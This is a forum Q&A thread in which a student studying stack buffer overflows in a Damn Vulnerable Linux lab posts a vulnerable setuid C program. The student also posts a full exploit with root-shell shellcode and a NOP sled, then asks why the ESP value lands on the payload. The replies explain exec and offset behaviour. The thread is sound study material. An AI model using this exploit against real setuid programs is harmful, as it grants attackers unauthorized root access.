# Buffer Overflow esp offset

Tags: c, stack, buffer-overflow

I'm a computer engineering student who is studying how stack buffer overflows work. The book I'm reading is The Art of Exploitation (1st edition) by Jon Erickson.
In order to practice what I'm studying I've installed Damn Vulnerable Linux distribution in a virtual machine. I've disabled ASRL (kernel.randomize_va_space = 0), I've compiled the following codes with **GCC 3.4.6**, I'm using **GDB 6.6** and the kernel of the distribution is **2.6.20**. My computer has an Intel processor.
The vulnerable program (test2) is created by root and is set as setuid.

The vulnerable code is the following:

```
//test2.c
int main(int argc, char *argv[])
{
char buffer[500];

strcpy(buffer, argv[1]);

return 0;
}
```

While  the exploit code, created by normal (non root) user, is the following:

```
//main.c
#include <stdlib.h>

char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

unsigned long sp(void)
{
__asm__("movl %esp, %eax");
}

int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer2, *ptr;

offset = 0;
esp = sp();

ret = esp - offset;

printf("Stack pointer (ESP) : 0x%x\n", esp);
printf(" Offset from ESP : 0x%x\n", offset);
printf("Desired Return Addr : 0x%x\n", ret);

buffer2 = malloc(600);

ptr = buffer2;
addr_ptr = (long *)ptr;
for (i = 0; i < 600; i += 4)
{
*(addr_ptr++) = ret;
}

for (i = 0; i < 200; i++)
{
buffer2[i] = '\x90';
}

ptr = buffer2 + 200;
for (i = 0; i < strlen(shellcode); i++)
{
*(ptr++) = shellcode[i];
}

buffer2[600 - 1] = 0;
execl("/root/workspace/test2/Release/test2", "test2", buffer2, 0);

free(buffer2);

return 0;
}
```

The program works, it exploits the buffer overflow vulnerability in test2 and gives me a root shell.
What I don't understand, even after reading the book several times and trying to find answers on the internet, is why the value of the stack pointer that we store in the variable **esp** is the return address of our shellcode. I've disassembled the program with GDB and everything works as the author says but I don't understand why this happens.

I would have liked to show you how the disassembled program looked like and how the memory looked like during execution, but I cannot copy/paste from the guest machine on the virtual machine and I'm not allowed to insert images in my question. So I can only try to describe what happens during execution of the program main (the one that exploits the BOF in test2):

disassembling main, I see that 28 bytes are allocated on the stack (7 variables * 4 bytes). Then the function sp() is called and the value of the stack pointer is stored in **esp**. The value stored in the variable esp is **0xbffff344**. Then, as you can see, we have some printf, we store the payload in buffer2 and then we call the execl function passing buffer2 as an argument.

now the root shell shows up and then the program exits. Disassembling the program after setting a different offset, I can clearly see that **0xbffff344** is precisely the address where the payload is stored when test2 is executed. Could you explain me how does this happen? Does execl sets a new stack frame for the test2 program? In main.c only 28 bytes are allocated on the stack, while in test2 500 bytes are allocated on the stack (for buffer2). So how do I know that the stack pointer that i get in main.c is precisely the return address of the shellcode?

I thank you and apologize if I wrote some stupid things.

Answer (score 2, accepted):

**Could you explain me how does this happen?**

When ASLR is disabled every executable starts at the same address, so given the stack pointer you are able to guess the required offset to find your buffer location in test2. This is also where the NOP sled becomes useful, since it give you multiple possible hit if the offset is not the exact displacement to the shellcode.

That being said the fact the the value of ESP in the main function of your exploit program IS the location of the executed buffer in test2 seems incorrect. Are you sure you just don't misinterpreted gdb results?

You should be able to compute the offset of the buffer using the following : esp - 500 + 28.

Note that you should always wear gloves when using such formula : how the compiler handles locals, (size, order, etc) can vary.

**So how do I know that the stack pointer that i get in main.c is precisely the return address of the shellcode?**

Well You don't. It depends of the machine, how the program was compiled etc.

**Does execl sets a new stack frame for the test2 program?**

From the execve man pages :

> The exec family of functions shall replace the current process image
>   with a new process image. The new image shall be constructed from a
>   regular, executable file called the new process image file. There
>   shall be no return from a successful exec, because the calling process
>   image is overlaid by the new process image.

The stack is overridden by a new one for test2.

Hope it helps :)

Comment: Thanks for the reply. I agree with your answer, I would compute the offset as you did: esp-500+28. What surprised me was that the exploit worked even with offset=0 and gdb confirmed that. Just one more thing: when I use gdb to examine memory during execution of the exploit program I see that there seem to be actually two "buffers" (with NOPs,shellcode and rets) on the stack. The first one starts at the address stored in variable "esp", while the other is stored at lower address on stack (it seems that the latter is the actual local buffer of the vulnerable function). Any ideas about this fact?

Comment: Has it anything to do with the fact that we pass a pointer to the buffer to the function execl? I was thinking: considering that data stored on the heap is "lost" after execl ends and the exploit buffer is stored on the heap (when we build it in the exploit program), when we pass "buffer2" to execl we are passing a pointer to something stored on heap that is gonna be lost. Maybe the execl will copy all the exploit buffer on the stack and for some reason (coincidence?) this buffer will start at the address stored in "esp", which is also the address of the third parameter we pass to the execl.

Comment: Where/When exactly are you seeing two buffers on the stack? Afaik traditional implementations of strcpy work only with a couple of local pointers/indexes (Have a look at [link](http://sourceware.org/git/?p=glibc.git)). So it's unlikely because a strcpy local buffer. A good thing might be to set a breakpoint in the strcpy function (break strcpy) and have a look at the instructions and the stack/registers yourself. For instance on my box stdlib is compiled with SSE2 support and the two parameters are passed via the registers. So it's really platform dependent.

Comment: Concerning execve, yes the memory allocated is reclaimed by the OS. But before that, execve copy the arguments in the kernel world and then try to find a handler for the image. If a handler is found, the arguments are passed to the new program image (see: [link](http://lxr.linux.no/linux+v2.6.20/fs/exec.c#L1123)). So I don't think you will see the exploitation string directly on the stack because a pointer is  passed to the execve function, but rather because of your platforme/compiler. That being said, I'm not a linux kernel guru so it might be appropriate to confirm that by other users